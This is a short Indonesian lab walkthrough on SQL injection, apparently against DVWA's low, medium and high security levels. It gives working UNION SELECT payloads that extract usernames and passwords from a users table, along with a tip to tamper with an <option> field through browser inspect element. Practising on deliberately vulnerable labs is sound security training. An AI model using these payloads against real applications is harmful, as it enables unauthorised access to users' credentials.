Skip to content

Latest commit

 

History

History
27 lines (21 loc) · 895 Bytes

SQL Injection.md

File metadata and controls

27 lines (21 loc) · 895 Bytes

SQL Injection

SQL Injection (SQLi) adalah celah keamanan web yang memungkinkan penyerang mengintruksi query yang dibuat aplikasi untuk melihat data yang biasanya tidak dapat mereka ambil, misalnya data pengguna lain atau data lain apapun yang dapat diakses oleh aplikasi itu sendiri

Security Low

Tambahkan spasi setelah --

a' UNION SELECT user, password FROM users -- 
q' UNION SELECT user, password FROM users #

alt text

Security Medium

Lakukan injeksi pada tag <option> menggunakan inspect element di browser

1 or 1=1 UNION SELECT user, password FROM users#

alt text

Security High

1' UNION SELECT user, password FROM users#